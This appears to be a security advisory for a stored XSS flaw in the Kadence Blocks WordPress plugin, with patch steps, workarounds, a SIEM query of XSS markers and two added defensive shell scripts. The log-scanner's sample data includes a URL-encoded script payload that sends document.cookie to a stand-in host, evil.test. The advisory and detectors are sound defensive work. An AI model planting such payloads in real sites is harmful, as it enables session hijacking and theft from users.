CVE-2025-5678

6.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in the Kadence Blocks WordPress plugin allows authenticated attackers with Contributor access or higher to inject malicious scripts via the 'redirectURL' parameter, which the plugin stores without adequate validation or output escaping. The script runs in the browser of anyone who views the affected content, including administrators, and can perform actions with the viewer's privileges or send them to an attacker-controlled site. Every WordPress site running a vulnerable plugin version (3.5.10 or earlier) is affected.

💻 Affected Systems

Products:
  • Gutenberg Blocks with AI by Kadence WP – Page Builder Features
Versions: All versions up to and including 3.5.10
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires a WordPress installation with the vulnerable plugin active and an attacker-controlled account with the Contributor role or higher. A Contributor can create and edit their own drafts, which is enough to store the payload; the script then fires when a higher-privileged user (for example an editor or administrator reviewing the draft) or a visitor views the content.

📦 What is this software?

Kadence Blocks, listed in the WordPress.org plugin directory as "Gutenberg Blocks with AI by Kadence WP – Page Builder Features" (slug kadence-blocks), is a plugin that adds page-builder style blocks and settings to the WordPress block editor. The redirectURL parameter is one of the block settings the plugin stores and renders.

⚠️ Risk & Real-World Impact

🔴 Worst Case

If an administrator views the injected content, the script runs with that administrator's privileges and can create a new administrator account, install a plugin or theme that carries a backdoor, deface the site, or redirect visitors to malicious sites; the outcome is persistent, site-wide compromise.

🟠 Likely Case

Attackers with Contributor accounts inject scripts that act on behalf of higher-privileged users who view the content (WordPress sets its authentication cookies HttpOnly, so the realistic play is to drive the victim's logged-in session through wp-admin or the REST API rather than to read the cookie) or that redirect visitors to phishing pages.

🟢 If Mitigated

With proper validation of the redirectURL value on save and escaping on output, as in the fixed release, the payload renders as inert text and the vulnerability is closed. Until the update is applied, limiting Contributor-level accounts reduces exposure.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access but is straightforward once the attacker holds Contributor credentials: the payload is saved once through the normal editing interface and fires on every subsequent view of the content.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.5.11 or later

Vendor Advisory: https://wordpress.org/plugins/kadence-blocks/#developers

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find 'Kadence Blocks' and click 'Update Now'.
4. Verify the version is 3.5.11 or higher.

🔧 Temporary Workarounds

Disable vulnerable plugin (all platforms)

Temporarily deactivate the Kadence Blocks plugin until patched. Pages built with Kadence blocks will render without the plugin's styling and scripts while it is deactivated, so test the public site afterwards.

wp plugin deactivate kadence-blocks

Restrict user roles (all platforms)

Remove or suspend Contributor-level accounts you do not need, or downgrade them to Subscriber, and enforce strict role-based access control for the rest. The vulnerability cannot be exploited without an account at Contributor level or higher, so every such account is part of the attack surface.

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules that block XSS payloads in the redirectURL parameter; make sure the rule inspects the URL-decoded value and the POST body (the value is submitted from the editor, not in a GET query string), or encoded payloads will slip through
  • Regularly audit user accounts and remove unnecessary Contributor-level access
  • Review content created or edited by Contributor-level accounts for unexpected redirectURL values; a WAF only stops new payloads, it does not remove one that is already stored

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins and read the version shown for Kadence Blocks (listed as "Gutenberg Blocks with AI by Kadence WP – Page Builder Features"). If the version is 3.5.10 or lower, the site is vulnerable.

Check Version:

wp plugin get kadence-blocks --field=version

Verify Fix Applied:

After update, confirm version is 3.5.11 or higher in WordPress plugins list.
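The update steps, the deactivation workaround, the role audit and the version check above can be run as one script from the server. The following is an added example and is not code from the advisory or from the Kadence Blocks project; it assumes wp-cli is installed and is run from the WordPress root (or with wp's --path set in the environment), and takes the plugin slug kadence-blocks and the fixed version 3.5.11 from the advisory. Version comparison is done numerically per component so that 3.5.9 is correctly treated as older than 3.5.11.

```shell
#!/bin/sh
# Added example, not part of the advisory or of the Kadence Blocks project.
# Assumes wp-cli is installed and the script runs from the WordPress root
# (or that wp's --path is configured in the environment).
# Plugin slug and fixed version are taken from the advisory.

PLUGIN=kadence-blocks
FIXED=3.5.11

# version_lt A B: exit 0 when dotted version A sorts before B, 1 otherwise.
# Components are compared as numbers (9 < 11), in awk so it works in any
# POSIX shell without sort -V or bash arrays.
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "."); m = split(b, y, ".")
    len = (n > m) ? n : m
    for (i = 1; i <= len; i++) {
      xi = (i <= n) ? x[i] + 0 : 0
      yi = (i <= m) ? y[i] + 0 : 0
      if (xi < yi) exit 0
      if (xi > yi) exit 1
    }
    exit 1   # equal versions are not "less than"
  }'
}

# is_vulnerable VERSION: exit 0 when VERSION is affected (anything below 3.5.11).
is_vulnerable() { version_lt "$1" "$FIXED"; }

# check_site: report the installed version and, if it is vulnerable, list every
# account that meets the Contributor-or-higher precondition. Custom roles that
# grant edit_posts would not appear here; add them to the role list if you use any.
check_site() {
  ver=$(wp plugin get "$PLUGIN" --field=version 2>/dev/null) || {
    echo "$PLUGIN is not installed on this site"; return 2; }
  if is_vulnerable "$ver"; then
    echo "VULNERABLE: $PLUGIN $ver is below $FIXED"
    echo "Accounts able to exploit it (Contributor or higher):"
    for role in contributor author editor administrator; do
      wp user list --role="$role" --fields=ID,user_login,user_email,roles
    done
    return 1
  fi
  echo "OK: $PLUGIN $ver"
  return 0
}

# fix_site: apply the official fix; if the update does not reach the fixed
# version, fall back to the advisory's workaround and deactivate the plugin.
fix_site() {
  if wp plugin update "$PLUGIN" && ! is_vulnerable "$(wp plugin get "$PLUGIN" --field=version)"; then
    echo "Updated: $PLUGIN $(wp plugin get "$PLUGIN" --field=version)"
  else
    echo "Update did not reach $FIXED; deactivating $PLUGIN as a temporary workaround"
    wp plugin deactivate "$PLUGIN"
  fi
}

# Usage: sh kadence-check.sh --check   (audit only, exit 1 when vulnerable)
#        sh kadence-check.sh --fix     (update, or deactivate if the update fails)
case "${1:-}" in
  --check) check_site ;;
  --fix)   fix_site ;;
esac
```

Run it with --check first from a cron job or a fleet tool; a non-zero exit marks the site for follow-up, and the listed accounts are the ones to review under the "Restrict user roles" workaround.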

📡 Detection & Monitoring

Log Indicators:

  • POST requests carrying a redirectURL parameter whose URL-decoded value contains script tags, inline event handlers or a javascript: scheme. The advisory points at admin-ajax.php; block settings are also saved together with the post through the block editor's REST request (wp-json/wp/v2/posts), so make sure request bodies for both paths are logged, as a plain access log records only the request line
  • Multiple failed login attempts followed by a successful Contributor-level login, or a Contributor account saving content at unusual times

Network Indicators:

  • Outbound connections to suspicious domains from WordPress server
  • Unexpected redirects from WordPress pages

SIEM Query:

source="wordpress.log" AND "redirectURL" AND ("<script" OR "%3Cscript" OR "javascript:" OR "javascript%3A" OR "onerror=" OR "onerror%3D" OR "onload=" OR "onload%3D")

The query matches literal and once-encoded payloads only. Where your SIEM can decode URL encoding before matching, do that instead of enumerating variants, and lower-case the value, since "<ScRiPt" would otherwise be missed.
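The log indicators and the SIEM query above share one weakness: the payload reaches the server URL-encoded, so a literal search for "<script>" sees "%3Cscript%3E" and misses it. The following is an added example, not code from the advisory, that decodes the redirectURL value (twice, to catch double encoding) before matching. It works on any log that records the request line with its query string; for POST bodies you would feed it a request log that captures parameters, such as a WAF audit log, since a standard access log does not include the body. The sample log lines are constructed for the example, and the admin-ajax action name in them is a placeholder, not a real Kadence action.

```shell
#!/bin/sh
# Added example, not from the advisory. Scans log lines for a redirectURL
# parameter whose URL-decoded value looks like an XSS payload.

# Constructed sample lines (not real traffic). "placeholder_action" is not a
# real Kadence AJAX action; it only makes the admin-ajax.php line well-formed.
SAMPLE_LOG='10.0.0.5 - - [01/Jun/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=placeholder_action&redirectURL=https%3A%2F%2Fexample.com%2Fthanks HTTP/1.1" 200 512
10.0.0.7 - - [01/Jun/2025:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=placeholder_action&redirectURL=%3Cscript%3Efetch(%22https%3A%2F%2Fevil.test%2Fc%3F%22%2Bdocument.cookie)%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.9 - - [01/Jun/2025:10:00:12 +0000] "POST /wp-json/wp/v2/posts/42 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jun/2025:10:01:30 +0000] "GET /?redirectURL=javascript%3Aalert(1) HTTP/1.1" 200 3100
10.0.0.8 - - [01/Jun/2025:10:02:00 +0000] "GET /?redirectURL=%2Fcontact HTTP/1.1" 200 3100'

# scan_log: read log lines on stdin, print "HIT <client> <raw value>" for each
# suspicious redirectURL, exit 0 if anything was flagged and 1 otherwise.
scan_log() {
  awk '
  # hex2dec("3C") -> 60; portable replacement for gawk-only strtonum()
  function hex2dec(h,    i, v) {
    v = 0
    for (i = 1; i <= length(h); i++)
      v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
    return v
  }
  # urldecode: "+" -> space, %XX -> the byte XX
  function urldecode(s,    out) {
    out = ""
    gsub(/[+]/, " ", s)
    while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
      out = out substr(s, 1, RSTART - 1) sprintf("%c", hex2dec(substr(s, RSTART + 1, 2)))
      s = substr(s, RSTART + 3)
    }
    return out s
  }
  {
    # pull the redirectURL value out of the request target
    if (match($0, /[?&]redirectURL=[^& "]*/)) {
      raw = substr($0, RSTART + 13, RLENGTH - 13)   # 13 = length of "?redirectURL="
      # decode twice so %253Cscript (double-encoded) is caught too, then lower-case
      val = tolower(urldecode(urldecode(raw)))
      if (val ~ /<script|javascript:|onerror=|onload=|<svg|<img|<iframe/) {
        print "HIT " $1 " " raw
        hits++
      }
    }
  }
  END { exit (hits > 0) ? 0 : 1 }
  '
}

# Demo on the constructed sample; for real use: scan_log < /var/log/nginx/access.log
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

The exit status makes the function usable as a cron check (`scan_log < access.log || alert`), and the printed raw value is what you paste back into the SIEM to find the same request in other sources. The pattern list is deliberately short; extend it with the handlers and tags you see in your own traffic rather than trying to enumerate every XSS vector.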
